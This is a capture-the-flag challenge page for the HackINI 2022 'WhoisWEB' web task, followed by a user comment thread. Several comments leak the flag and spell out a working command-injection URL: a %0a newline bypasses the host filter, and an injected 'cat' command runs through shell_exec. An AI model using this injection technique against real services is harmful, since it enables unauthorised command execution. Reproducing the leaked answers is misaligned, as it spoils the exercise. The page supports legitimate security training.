WhoisWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 905
提  示: There was a problem with the first version, this is the fixed version.
描  述:
A web-based Whois service
...
登录回复
评论
xzs297995 1年前
举报

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 2
xiaoxiao972521 1年前
举报

/query.php?host=whois.verisign-grs.com%0a&query=cat%20thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 0
.⎛⎝•̀ω•́⎠⎞. 1年前
举报

1.读php文件 2.分析出存在危险函数shell_exec 3.通过url编码换行绕过第一个参数host 4.第二个参数query可以输入rce。空格用url编码绕

回复 2
unknown237819 1年前
举报

在本题的正则匹配中,空格无法匹配$前的任何字符,所以%20是不可行的,if的条件都过不了;在whois.verisign-grs.com后加换行是可行的,不仅字符串本身可以过if,换行后相当于重新输命令,即query给出的参数直接执行命令

回复 2
868954104 1年前
举报

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065} /query.php?host=whois.verisign-grs.com%0a&query=cat+thisistheflagwithrandomstuffthatyouwontguessJUSTCATME

回复 1
vchopin 1年前
举报

shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

回复 0
yituoshi 1年前
举报

Half the truth is often a big lie: thisistheflagwithrandomstuffthatyouwontguessJUSTCATSHE

回复 0
1959272171 1年前
举报

空格被过滤了 用%20绕过

回复 0
justsosoloveyou 1年前
举报

抓包,发现/query.php能看源码,是RCE。 有正则过滤,用换行符的编码%0a来截断第一个参数即可。用第二个参数执行任意命令, ls查看文件列表,cat查看文件内容。

回复 5
宇宙无敌靓仔 1年前
举报

playload 怎么构造呢

回复 0
qingfeng1115 1年前
举报

flag 文件名字是什么

回复 0
wclc 1年前
举报

有点理解不了

回复 0

WriteUp

image
hopeinhand

1 金币

立即查看

评分(1)

解题动态

18242323600 攻破了该题 3天前
15031597817 攻破了该题 3天前
lqy123 攻破了该题 4天前
901548546 攻破了该题 4天前
捏捏捏扣 攻破了该题 4天前
wwhrhy 攻破了该题 4天前
孙燕姿圈外男友 攻破了该题 4天前
luvwq 攻破了该题 4天前
hgj123 攻破了该题 4天前
XiaoYeCM 攻破了该题 4天前
nickhu 攻破了该题 4天前
tdwj 攻破了该题 5天前
5032894 攻破了该题 5天前
lixiao2 攻破了该题 6天前
lihr1701 攻破了该题 6天前
记忆劫匪 攻破了该题 6天前
liqing 攻破了该题 7天前
风车gogo 攻破了该题 7天前
FreeMan 攻破了该题 8天前
fdlm 攻破了该题 11天前
问题反馈